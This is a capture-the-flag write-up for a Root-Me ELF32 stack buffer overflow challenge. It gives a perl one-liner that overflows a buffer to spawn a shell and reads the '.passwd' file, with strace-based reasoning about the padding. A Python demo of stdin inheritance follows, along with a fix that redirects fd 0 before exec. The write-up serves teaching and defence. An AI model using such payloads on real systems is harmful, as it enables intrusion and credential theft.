root-me: overflow_basic1

solution for:
http://www.root-me.org/en/Challenges/App-System/ELF32-Stack-buffer-overflow-basic-1
-
perl -e 'print "A"x40 . "\xef\xbe\xad\xde". "x" x 4052 . "cat .passwd"' | ./ch13
notes:
cat /challenge/app-systeme/ch13/.passwd - must be added after the shell is executed (sent on the shell's standard input).
The shell's standard input is inherited from the app executing it.
So, after the app finishes reading its portion of the data, the rest of the input is still in the pipe and goes to the program the app executes.
To see how many characters are really read from stdin, run the program under strace (you can also find it out by trial and error, but this is the precise way):
strace ./ch13
you will be asked to type input; notice something like this just before the input is read:
mmap2(NULL, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0xb7fda000
read(0,
^ here is the line that reads input
so you can see that a 4096-byte buffer is reserved, and read() is asked for 4096 bytes.
We already have filled some, by:
perl -e 'print "A"x40 . "\xef\xbe\xad\xde"
filled size = 40 + 4 = 44
we should fill the remaining size by some padding, let's calculate the padding size:
4096 - 44 = 4052
so, append the padding: "x" x 4052
and then put the command that has to be placed on the stdin of /bin/dash: "cat .passwd"
when you put all together it looks like:
perl -e 'print "A"x40 . "\xef\xbe\xad\xde". "x" x 4052 . "cat .passwd"' | ./ch13
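The mechanism the notes above rely on (one read() of 4096 bytes consumes the front of the pipe, and whatever is left over is inherited by the program spawned afterwards) can be reproduced without the challenge binary. The example below is added here and is not part of the original solution: it uses a small Python child process as a stand-in for ch13, builds a payload padded to exactly the read size, and shows both the inherited-stdin case and the defensive variant where the program points fd 0 at /dev/null before exec'ing, so the spawned program never sees the leftover input. It assumes a POSIX system with `cat` on PATH; the 4096-byte read size is taken from the strace output above.

```python
import os
import subprocess
import sys

# Number of bytes the challenge binary asks for in its single read(0, ...),
# as seen in the strace output.
READ_SIZE = 4096

# Stand-in for the challenge binary (constructed, not the real ch13): consume
# exactly READ_SIZE bytes from stdin, then replace itself with cat, which
# inherits fd 0. The real binary issues one read(); we loop so the example
# consumes exactly READ_SIZE regardless of how the pipe delivers the data.
CHILD_INHERIT = f"""
import os
n = 0
while n < {READ_SIZE}:
    chunk = os.read(0, {READ_SIZE} - n)
    if not chunk:
        break
    n += len(chunk)
os.execvp('cat', ['cat'])
"""

# Defensive variant: same read, but fd 0 is redirected to /dev/null before the
# exec, so the spawned program cannot read the parent's unconsumed input.
CHILD_DETACHED = f"""
import os
n = 0
while n < {READ_SIZE}:
    chunk = os.read(0, {READ_SIZE} - n)
    if not chunk:
        break
    n += len(chunk)
devnull = os.open('/dev/null', os.O_RDONLY)
os.dup2(devnull, 0)
os.execvp('cat', ['cat'])
"""


def build_payload(prefix: bytes, read_size: int, trailing: bytes) -> bytes:
    """Pad prefix with 'x' up to read_size (what one read() consumes), then append trailing.

    With a 44-byte prefix and read_size 4096 the padding is 4052 bytes, the
    figure computed in the notes above.
    """
    if len(prefix) > read_size:
        raise ValueError(f"prefix of {len(prefix)} bytes exceeds read size {read_size}")
    padding = b"x" * (read_size - len(prefix))
    return prefix + padding + trailing


def leftover_seen_by_child(payload: bytes, child_src: str) -> bytes:
    """Pipe payload into the stand-in child and return what the exec'ed cat printed."""
    proc = subprocess.run(
        [sys.executable, "-c", child_src],
        input=payload,
        capture_output=True,
        check=True,
    )
    return proc.stdout


if __name__ == "__main__":
    # Constructed sample: a 44-byte prefix standing in for the 40 filler bytes
    # plus a 4-byte saved return address, then a line that should only be
    # visible to the spawned program.
    payload = build_payload(b"A" * 44, READ_SIZE, b"leftover line\n")
    print("padding bytes:", len(payload) - 44 - len(b"leftover line\n"))
    print("inherited stdin, cat printed:", leftover_seen_by_child(payload, CHILD_INHERIT))
    print("stdin detached, cat printed: ", leftover_seen_by_child(payload, CHILD_DETACHED))
```

The first run prints the trailing line, because the 4096-byte read consumed only the padding and cat inherited the rest of the pipe; the second run prints nothing. For a program that spawns a child after reading user input, redirecting or closing fd 0 before the exec (as in `CHILD_DETACHED`) is the simple way to make sure unconsumed input never reaches the child.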